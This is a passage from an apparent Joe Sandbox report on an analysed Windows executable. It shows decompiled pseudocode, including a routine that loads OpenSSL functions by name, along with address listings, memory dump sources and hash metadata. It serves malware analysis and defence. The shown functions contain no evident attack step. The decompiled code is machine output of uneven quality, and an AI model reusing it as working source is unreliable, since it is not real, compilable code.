							 *(__eax + 0x14) = 1;
							 *(__eax + 0x18) = 1;
							__eax =  *(__ebx + 0x40);
							__eax =  *(__ebx + 0x40) + 0xa8;
							 *__eax = 3;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 1;
							 *(__eax + 0x14) = 1;
							 *(__eax + 0x18) = 1;
							__eax =  *(__ebx + 0x40);
							__eax =  *(__ebx + 0x40) + 0xfc;
							 *__eax = 4;
							 *(__eax + 8) = 2;
							 *(__eax + 0xc) = 2;
							 *(__eax + 0x10) = 0;
							__edx = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							return __eax;
							goto L17;
					}
				}
				L17:
			}






                                                                                                                                                                                                                            0x0046c7cd
                                                                                                                                                                                                                            0x0046c7d0
                                                                                                                                                                                                                            0x0046c7d6
                                                                                                                                                                                                                            0x0046c7d8
                                                                                                                                                                                                                            0x0046c7da
                                                                                                                                                                                                                            0x0046c7e4
                                                                                                                                                                                                                            0x0046c7eb
                                                                                                                                                                                                                            0x0046c7eb
                                                                                                                                                                                                                            0x0046c7ed
                                                                                                                                                                                                                            0x0046c7f2
                                                                                                                                                                                                                            0x0046c7fa
                                                                                                                                                                                                                            0x0046c803
                                                                                                                                                                                                                            0x0046cb71
                                                                                                                                                                                                                            0x0046cb80
                                                                                                                                                                                                                            0x0046c809
                                                                                                                                                                                                                            0x0046c809
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046cb08
                                                                                                                                                                                                                            0x0046cb0b
                                                                                                                                                                                                                            0x0046cb0e
                                                                                                                                                                                                                            0x0046cb14
                                                                                                                                                                                                                            0x0046cb1b
                                                                                                                                                                                                                            0x0046cb1d
                                                                                                                                                                                                                            0x0046cb24
                                                                                                                                                                                                                            0x0046cb27
                                                                                                                                                                                                                            0x0046cb2a
                                                                                                                                                                                                                            0x0046cb31
                                                                                                                                                                                                                            0x0046cb33
                                                                                                                                                                                                                            0x0046cb35
                                                                                                                                                                                                                            0x0046cb35
                                                                                                                                                                                                                            0x0046cb37
                                                                                                                                                                                                                            0x0046cb67
                                                                                                                                                                                                                            0x0046cb40
                                                                                                                                                                                                                            0x0046cb43
                                                                                                                                                                                                                            0x0046cb46
                                                                                                                                                                                                                            0x0046cb49
                                                                                                                                                                                                                            0x0046cb4b
                                                                                                                                                                                                                            0x0046cb52
                                                                                                                                                                                                                            0x0046cb59
                                                                                                                                                                                                                            0x0046cb5e
                                                                                                                                                                                                                            0x0046cb63
                                                                                                                                                                                                                            0x0046cb66
                                                                                                                                                                                                                            0x0046cb66
                                                                                                                                                                                                                            0x0046cb6e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046c828
                                                                                                                                                                                                                            0x0046c832
                                                                                                                                                                                                                            0x0046c839
                                                                                                                                                                                                                            0x0046c840
                                                                                                                                                                                                                            0x0046c846
                                                                                                                                                                                                                            0x0046c84d
                                                                                                                                                                                                                            0x0046c854
                                                                                                                                                                                                                            0x0046c859
                                                                                                                                                                                                                            0x0046c85c
                                                                                                                                                                                                                            0x0046c861
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046c862
                                                                                                                                                                                                                            0x0046c86c
                                                                                                                                                                                                                            0x0046c873
                                                                                                                                                                                                                            0x0046c878
                                                                                                                                                                                                                            0x0046c87a
                                                                                                                                                                                                                            0x0046c880
                                                                                                                                                                                                                            0x0046c887
                                                                                                                                                                                                                            0x0046c88e
                                                                                                                                                                                                                            0x0046c893
                                                                                                                                                                                                                            0x0046c896
                                                                                                                                                                                                                            0x0046c899
                                                                                                                                                                                                                            0x0046c89c
                                                                                                                                                                                                                            0x0046c89e
                                                                                                                                                                                                                            0x0046c8a3
                                                                                                                                                                                                                            0x0046c8a9
                                                                                                                                                                                                                            0x0046c8b0
                                                                                                                                                                                                                            0x0046c8b7
                                                                                                                                                                                                                            0x0046c8ba
                                                                                                                                                                                                                            0x0046c8bc
                                                                                                                                                                                                                            0x0046c8bf
                                                                                                                                                                                                                            0x0046c8c2
                                                                                                                                                                                                                            0x0046c8c7
                                                                                                                                                                                                                            0x0046c8cc
                                                                                                                                                                                                                            0x0046c8ce
                                                                                                                                                                                                                            0x0046c8d4
                                                                                                                                                                                                                            0x0046c8db
                                                                                                                                                                                                                            0x0046c8e2
                                                                                                                                                                                                                            0x0046c8e7
                                                                                                                                                                                                                            0x0046c8ea
                                                                                                                                                                                                                            0x0046c8ef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046c8f0
                                                                                                                                                                                                                            0x0046c8fa
                                                                                                                                                                                                                            0x0046c901
                                                                                                                                                                                                                            0x0046c904
                                                                                                                                                                                                                            0x0046c908
                                                                                                                                                                                                                            0x0046c90e
                                                                                                                                                                                                                            0x0046c915
                                                                                                                                                                                                                            0x0046c91c
                                                                                                                                                                                                                            0x0046c91f
                                                                                                                                                                                                                            0x0046c921
                                                                                                                                                                                                                            0x0046c924
                                                                                                                                                                                                                            0x0046c927
                                                                                                                                                                                                                            0x0046c92a
                                                                                                                                                                                                                            0x0046c92d
                                                                                                                                                                                                                            0x0046c933
                                                                                                                                                                                                                            0x0046c93a
                                                                                                                                                                                                                            0x0046c941
                                                                                                                                                                                                                            0x0046c948
                                                                                                                                                                                                                            0x0046c94f
                                                                                                                                                                                                                            0x0046c956
                                                                                                                                                                                                                            0x0046c959
                                                                                                                                                                                                                            0x0046c95e
                                                                                                                                                                                                                            0x0046c964
                                                                                                                                                                                                                            0x0046c96b
                                                                                                                                                                                                                            0x0046c972
                                                                                                                                                                                                                            0x0046c979
                                                                                                                                                                                                                            0x0046c980
                                                                                                                                                                                                                            0x0046c989
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046c98a
                                                                                                                                                                                                                            0x0046c994
                                                                                                                                                                                                                            0x0046c99b
                                                                                                                                                                                                                            0x0046c99e
                                                                                                                                                                                                                            0x0046c9a2
                                                                                                                                                                                                                            0x0046c9a8
                                                                                                                                                                                                                            0x0046c9af
                                                                                                                                                                                                                            0x0046c9b6
                                                                                                                                                                                                                            0x0046c9b9
                                                                                                                                                                                                                            0x0046c9bb
                                                                                                                                                                                                                            0x0046c9be
                                                                                                                                                                                                                            0x0046c9c1
                                                                                                                                                                                                                            0x0046c9c6
                                                                                                                                                                                                                            0x0046c9c9
                                                                                                                                                                                                                            0x0046c9cb
                                                                                                                                                                                                                            0x0046c9d1
                                                                                                                                                                                                                            0x0046c9d8
                                                                                                                                                                                                                            0x0046c9df
                                                                                                                                                                                                                            0x0046c9e4
                                                                                                                                                                                                                            0x0046c9e7
                                                                                                                                                                                                                            0x0046c9ea
                                                                                                                                                                                                                            0x0046c9ed
                                                                                                                                                                                                                            0x0046c9ef
                                                                                                                                                                                                                            0x0046c9f6
                                                                                                                                                                                                                            0x0046c9fc
                                                                                                                                                                                                                            0x0046ca03
                                                                                                                                                                                                                            0x0046ca0a
                                                                                                                                                                                                                            0x0046ca0d
                                                                                                                                                                                                                            0x0046ca0f
                                                                                                                                                                                                                            0x0046ca12
                                                                                                                                                                                                                            0x0046ca15
                                                                                                                                                                                                                            0x0046ca1a
                                                                                                                                                                                                                            0x0046ca1f
                                                                                                                                                                                                                            0x0046ca21
                                                                                                                                                                                                                            0x0046ca27
                                                                                                                                                                                                                            0x0046ca2e
                                                                                                                                                                                                                            0x0046ca35
                                                                                                                                                                                                                            0x0046ca3a
                                                                                                                                                                                                                            0x0046ca3d
                                                                                                                                                                                                                            0x0046ca42
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046ca43
                                                                                                                                                                                                                            0x0046ca4d
                                                                                                                                                                                                                            0x0046ca54
                                                                                                                                                                                                                            0x0046ca57
                                                                                                                                                                                                                            0x0046ca5b
                                                                                                                                                                                                                            0x0046ca61
                                                                                                                                                                                                                            0x0046ca68
                                                                                                                                                                                                                            0x0046ca6f
                                                                                                                                                                                                                            0x0046ca72
                                                                                                                                                                                                                            0x0046ca74
                                                                                                                                                                                                                            0x0046ca77
                                                                                                                                                                                                                            0x0046ca7a
                                                                                                                                                                                                                            0x0046ca7d
                                                                                                                                                                                                                            0x0046ca7f
                                                                                                                                                                                                                            0x0046ca84
                                                                                                                                                                                                                            0x0046ca8a
                                                                                                                                                                                                                            0x0046ca91
                                                                                                                                                                                                                            0x0046ca98
                                                                                                                                                                                                                            0x0046ca9f
                                                                                                                                                                                                                            0x0046caa6
                                                                                                                                                                                                                            0x0046caad
                                                                                                                                                                                                                            0x0046cab0
                                                                                                                                                                                                                            0x0046cab5
                                                                                                                                                                                                                            0x0046cabb
                                                                                                                                                                                                                            0x0046cac2
                                                                                                                                                                                                                            0x0046cac9
                                                                                                                                                                                                                            0x0046cad0
                                                                                                                                                                                                                            0x0046cad7
                                                                                                                                                                                                                            0x0046cade
                                                                                                                                                                                                                            0x0046cae1
                                                                                                                                                                                                                            0x0046cae6
                                                                                                                                                                                                                            0x0046caec
                                                                                                                                                                                                                            0x0046caf3
                                                                                                                                                                                                                            0x0046cafa
                                                                                                                                                                                                                            0x0046cafd
                                                                                                                                                                                                                            0x0046caff
                                                                                                                                                                                                                            0x0046cb02
                                                                                                                                                                                                                            0x0046cb07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046c809
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 677ce04e0d67042dc2a9a4b64202fb5d0def2799379c2ab2145808b1453b9cf8
                                                                                                                                                                                                                            • Instruction ID: 6f579dc5cf93ed67dbe7923bc53dacc3f904af7b4f4082abccb4bc8954db20f7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 677ce04e0d67042dc2a9a4b64202fb5d0def2799379c2ab2145808b1453b9cf8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AB15FB1604200CFE748CF19D489B45BBE1BF49318F1680AAD9098F3A7D7BAD985CF95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045FCC8 Relevance: .2, Instructions: 236COMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E0045FCC8(intOrPtr __eax, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int* _v20;
				intOrPtr _v264;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				char* _v476;
				char _v484;
				intOrPtr _v516;
				char _v536;
				void _v668;
				char _v684;
				void* __ebp;
				void* _t120;
				intOrPtr _t150;
				signed int _t166;
				signed int _t170;
				intOrPtr* _t188;
				signed int _t191;
				signed int _t192;
				signed int _t199;
				intOrPtr _t214;
				intOrPtr _t240;
				void* _t255;
				void* _t257;
				intOrPtr _t259;

				_t255 = _t257;
				_v8 = __eax;
				E004032B4( &_v668, 0x288);
				memcpy( &_v668, 0x49c094, 0x21 << 2);
				_t259 = _t257 + 0xfffffffffffffd64;
				_v484 =  &_v668;
				E0046D02C( &_v484, 0x174, 0x3e);
				_push(_t255);
				_push(0x460034);
				_push( *[fs:edx]);
				 *[fs:edx] = _t259;
				_push(_t255);
				_push(0x45fffd);
				_push( *[fs:edx]);
				 *[fs:edx] = _t259;
				_v536 = 0x45f910;
				_v516 = _v8;
				_v476 =  &_v536;
				if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 8)) != 0) {
					E00460758(_v8);
				}
				 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 8)) = E00403BBC(1);
				E0041D6C0(_t109, 0, 0);
				E0046C400( &_v484,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 8)));
				_t188 =  *((intOrPtr*)(_v8 + 0x2c));
				if(_t188 == 0 ||  *((intOrPtr*)( *_t188 + 0x2c))() == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x20))() == 0) {
					_pop(_t214);
					 *[fs:eax] = _t214;
					_t120 = E00404424();
					return _t120;
				} else {
					_v456 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x2c))();
					 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x2c))();
					_v452 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x20))();
					 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x20))();
					_v448 = 3;
					_v444 = 2;
					_v20 = E00429914(1);
					 *[fs:edx] = _t259;
					_t199 =  *_v20;
					 *((intOrPtr*)(_t199 + 8))( *[fs:edx], 0x45ffec, _t255);
					E0042AE8C(_v20, 6);
					E0046C658( &_v484);
					_t200 = _t199 | 0xffffffff;
					E0046C55C( &_v484, _t199 | 0xffffffff,  *((intOrPtr*)(_v8 + 0x3f)));
					_t150 = _v8;
					__eflags =  *((char*)(_t150 + 0x3d));
					if( *((char*)(_t150 + 0x3d)) != 0) {
						 *((char*)( *((intOrPtr*)(_v8 + 0x28)) + 0x14)) = 1;
						E0046C7CC( &_v484, 1);
					}
					__eflags =  *((char*)(_v8 + 0x41));
					if(__eflags != 0) {
						E0046CC34( &_v484, _t200);
					}
					_v16 = E0042A04C(_v20, _t200, 0, __eflags);
					_t191 = E0042A04C(_v20, _t200, 1, __eflags) - _v16;
					__eflags = _t191;
					if(_t191 <= 0) {
						L13:
						_v12 = 1;
					} else {
						__eflags = _t191 & 0x00000003;
						if((_t191 & 0x00000003) != 0) {
							goto L13;
						} else {
							_v12 = _v452;
						}
					}
					_push(0);
					_push(0);
					E00419804(0, 0,  &_v684, 0);
					_push( &_v684);
					_push(0);
					E00403DE8(_v8, __eflags);
					_push(_t255);
					_push(0x45ffcf);
					_push( *[fs:edx]);
					 *[fs:edx] = _t259;
					E0046CE4C( &_v484, 0xffffffff);
					while(1) {
						__eflags = _v264 - _v452;
						if(_v264 >= _v452) {
							break;
						}
						_t166 = E0046CEC0( &_v484, _v12,  &_v16);
						_t88 =  &_v16;
						 *_t88 = _v16 + _t191 * _t166;
						__eflags =  *_t88;
					}
					E0046D14C( &_v484);
					_pop(_t240);
					 *[fs:eax] = _t240;
					_push(0x45ffd6);
					_t170 = E004027EC();
					__eflags = _t170;
					if(_t170 != 0) {
						_t192 = 0;
						__eflags = 0;
					} else {
						_t192 = 0x64;
					}
					_push(_t192);
					_push(0);
					__eflags = 0;
					E00419804(0, 0,  &_v684, 0);
					_push( &_v684);
					_push(0);
					return E00403DE8(_v8, __eflags);
				}
			}
































                                                                                                                                                                                                                            0x0045fcc9
                                                                                                                                                                                                                            0x0045fcd4
                                                                                                                                                                                                                            0x0045fce4
                                                                                                                                                                                                                            0x0045fcf9
                                                                                                                                                                                                                            0x0045fcf9
                                                                                                                                                                                                                            0x0045fd01
                                                                                                                                                                                                                            0x0045fd17
                                                                                                                                                                                                                            0x0045fd1e
                                                                                                                                                                                                                            0x0045fd1f
                                                                                                                                                                                                                            0x0045fd24
                                                                                                                                                                                                                            0x0045fd27
                                                                                                                                                                                                                            0x0045fd2c
                                                                                                                                                                                                                            0x0045fd2d
                                                                                                                                                                                                                            0x0045fd32
                                                                                                                                                                                                                            0x0045fd35
                                                                                                                                                                                                                            0x0045fd38
                                                                                                                                                                                                                            0x0045fd45
                                                                                                                                                                                                                            0x0045fd51
                                                                                                                                                                                                                            0x0045fd61
                                                                                                                                                                                                                            0x0045fd66
                                                                                                                                                                                                                            0x0045fd66
                                                                                                                                                                                                                            0x0045fd7f
                                                                                                                                                                                                                            0x0045fd88
                                                                                                                                                                                                                            0x0045fd9c
                                                                                                                                                                                                                            0x0045fda4
                                                                                                                                                                                                                            0x0045fda9
                                                                                                                                                                                                                            0x0045fdc7
                                                                                                                                                                                                                            0x0045fdca
                                                                                                                                                                                                                            0x0045fdcd
                                                                                                                                                                                                                            0x00460041
                                                                                                                                                                                                                            0x0045fdd7
                                                                                                                                                                                                                            0x0045fde2
                                                                                                                                                                                                                            0x0045fdf9
                                                                                                                                                                                                                            0x0045fe07
                                                                                                                                                                                                                            0x0045fe1e
                                                                                                                                                                                                                            0x0045fe21
                                                                                                                                                                                                                            0x0045fe2b
                                                                                                                                                                                                                            0x0045fe41
                                                                                                                                                                                                                            0x0045fe4f
                                                                                                                                                                                                                            0x0045fe5b
                                                                                                                                                                                                                            0x0045fe5d
                                                                                                                                                                                                                            0x0045fe65
                                                                                                                                                                                                                            0x0045fe70
                                                                                                                                                                                                                            0x0045fe83
                                                                                                                                                                                                                            0x0045fe86
                                                                                                                                                                                                                            0x0045fe8b
                                                                                                                                                                                                                            0x0045fe8e
                                                                                                                                                                                                                            0x0045fe92
                                                                                                                                                                                                                            0x0045fe9a
                                                                                                                                                                                                                            0x0045fea9
                                                                                                                                                                                                                            0x0045fea9
                                                                                                                                                                                                                            0x0045feb1
                                                                                                                                                                                                                            0x0045feb5
                                                                                                                                                                                                                            0x0045febd
                                                                                                                                                                                                                            0x0045febd
                                                                                                                                                                                                                            0x0045fecc
                                                                                                                                                                                                                            0x0045fede
                                                                                                                                                                                                                            0x0045fee1
                                                                                                                                                                                                                            0x0045fee3
                                                                                                                                                                                                                            0x0045fef5
                                                                                                                                                                                                                            0x0045fef5
                                                                                                                                                                                                                            0x0045fee5
                                                                                                                                                                                                                            0x0045fee5
                                                                                                                                                                                                                            0x0045fee8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045feea
                                                                                                                                                                                                                            0x0045fef0
                                                                                                                                                                                                                            0x0045fef0
                                                                                                                                                                                                                            0x0045fee8
                                                                                                                                                                                                                            0x0045fefc
                                                                                                                                                                                                                            0x0045fefe
                                                                                                                                                                                                                            0x0045ff0f
                                                                                                                                                                                                                            0x0045ff1a
                                                                                                                                                                                                                            0x0045ff1b
                                                                                                                                                                                                                            0x0045ff29
                                                                                                                                                                                                                            0x0045ff30
                                                                                                                                                                                                                            0x0045ff31
                                                                                                                                                                                                                            0x0045ff36
                                                                                                                                                                                                                            0x0045ff39
                                                                                                                                                                                                                            0x0045ff45
                                                                                                                                                                                                                            0x0045ff65
                                                                                                                                                                                                                            0x0045ff6b
                                                                                                                                                                                                                            0x0045ff71
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045ff58
                                                                                                                                                                                                                            0x0045ff62
                                                                                                                                                                                                                            0x0045ff62
                                                                                                                                                                                                                            0x0045ff62
                                                                                                                                                                                                                            0x0045ff62
                                                                                                                                                                                                                            0x0045ff79
                                                                                                                                                                                                                            0x0045ff80
                                                                                                                                                                                                                            0x0045ff83
                                                                                                                                                                                                                            0x0045ff86
                                                                                                                                                                                                                            0x0045ff8b
                                                                                                                                                                                                                            0x0045ff90
                                                                                                                                                                                                                            0x0045ff92
                                                                                                                                                                                                                            0x0045ff9b
                                                                                                                                                                                                                            0x0045ff9b
                                                                                                                                                                                                                            0x0045ff94
                                                                                                                                                                                                                            0x0045ff94
                                                                                                                                                                                                                            0x0045ff94
                                                                                                                                                                                                                            0x0045ff9d
                                                                                                                                                                                                                            0x0045ff9e
                                                                                                                                                                                                                            0x0045ffad
                                                                                                                                                                                                                            0x0045ffaf
                                                                                                                                                                                                                            0x0045ffba
                                                                                                                                                                                                                            0x0045ffbb
                                                                                                                                                                                                                            0x0045ffce
                                                                                                                                                                                                                            0x0045ffce

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1531683806-0
                                                                                                                                                                                                                            • Opcode ID: e19e3150e2c7cd44ebb793bf2050a4d8a611c26cac3e0918ad546bb298657608
                                                                                                                                                                                                                            • Instruction ID: 0c536aafc851fcace6ea98d8c72b1a8cfc1ac549c837b81b3b786a54fc8c1cca
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e19e3150e2c7cd44ebb793bf2050a4d8a611c26cac3e0918ad546bb298657608
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85A12C74A002189FDB10DF65C985B9DB7F5FF49304F1081A6E808A73A2DB74AE89CF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004906B8 Relevance: 142.1, APIs: 2, Strings: 79, Instructions: 395libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004906B8() {
				void* __ebx;
				void* _t158;

				_t158 = 1;
				if( *0x49d588 == 0) {
					 *0x49d588 = LoadLibraryA("libeay32.dll");
				}
				_t160 =  *0x49d584;
				if( *0x49d584 == 0) {
					 *0x49d584 = LoadLibraryA("ssleay32.dll");
					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
					 *0x49d490 = E0049058C("SSL_new", _t158);
					 *0x49d494 = E0049058C("SSL_free", _t158);
					 *0x49d498 = E0049058C("SSL_accept", _t158);
					 *0x49d49c = E0049058C("SSL_connect", _t158);
					 *0x49d4a0 = E0049058C("SSL_read", _t158);
					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
					 *0x49d4a8 = E0049058C("SSL_write", _t158);
					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
					 *0x49d52c = E0049058C("X509_digest", _t158);
					 *0x49d530 = E0049058C("EVP_md5", _t158);
					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
					 *0x49d590 = E00490648("RAND_screen", _t158);
					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
					 *0x49d550 = E00490648("des_set_key", _t158);
					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
